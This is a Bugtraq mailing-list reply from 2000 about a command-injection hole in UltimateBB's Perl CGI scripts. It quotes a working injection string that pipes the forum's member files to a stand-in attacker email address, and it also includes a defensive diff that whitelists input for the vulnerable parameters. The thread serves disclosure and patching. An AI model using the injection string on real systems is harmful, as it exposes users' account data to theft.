Re: perl-cgi hole in UltimateBB by Infopop Corp.

[ILazar () TBG COM (Irwin Lazar)]

according to the folks at UBB, the latest version 5.43d, fixes this
vulnerability.  Has anyone been able to verify if this is in fact correct?

Irwin

> -----Original Message-----
> From: Jordan Ritter [mailto:jpr5 () BOS BINDVIEW COM]
> Sent: Tuesday, February 15, 2000 8:48 PM
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.
>
>
> On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
>
> # It works on the full version also...
> #
> # Little different syntax:
> # topic=012345.cgi|cat%20../Members/*|mail hacker () evil org|
> # (note the ../ on the Members.  You have to go up a
> directory to get the
> # file.  Maybe you could stop it via simple folder permissions??)
>
> Provided with no warranty.  unescape() borrowed from the far superior
> CGI.pm.  It appears to work, but I haven't checked it for
> completeness.
> The ubb scripts are a programming disaster, and pass around
> metachars and
> filenames through form parameters, making input validation difficult.
> The patch below selectively validates input based on the name of the
> variable we're validating (i.e. only certain variables are dangerous;
> others are just dumb and not a risk).  It's better to try and
> validate at
> the top leven then code review the source and try to patch
> every idiotic
> mistake that was made.  At the very least, this stops the
> specific attack
> that was posted.  There could be other holes that this
> doesn't cover, or
> alternative ways to carry out the same attack.  Hopefully
> Infopop will get
> their act together soon.
>
> I can't believe they distribute this crap as commercial software.
> Actually, what I can't believe is how many people paid for
> it.  God help
> us all.
>
>
> --jordan
>
>
> $ diff ubb_library.pl ubb_library.pl.orig
> 84,93d83
> < # unescape URL-encoded data
> < sub unescape {
> <     shift() if ref($_[0]);
> <     my $todecode = shift;
> <     return undef unless defined($todecode);
> <     $todecode =~ tr/+/ /;       # pluses become spaces
> <     $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
> <     return $todecode;
> < }
> <
> 1047a1038
> >
> 1112,1120d1102
> <       # clean input
> <     if ($key =~ /^(forum|topic|number|replynum)$/i) {
> <         my($newval) = &unescape($val);
> <
> <         if ($newval !~ /^([ -\@\w.]+)$/) {
> <             $val = "bad_input";
> <         }
> <     }
> <
> 1266,1284d1247
> <
> < my(@out);
> < foreach $row (@in) {
> <     my($name,$value) = split ("=", $row);
> <
> <     if ($name =~ /^(forum|topic|number|replynum)$/i) {
> <         my($newvalue) = &unescape($value);
> <
> <         if ($newvalue !~ /^([ -\@\w.]+)$/) {
> <             $value = "bad_input";
> <         }
> <
> <         push @out, "$name=$value";
> <      } else {
> <         push @out, $row;
> <      }
> < }
> <    @in = @out;

<HR NOSHADE>
<UL>
<LI>application/octet-stream attachment: Irwin_Lazar__E-mail_.vcf
</UL>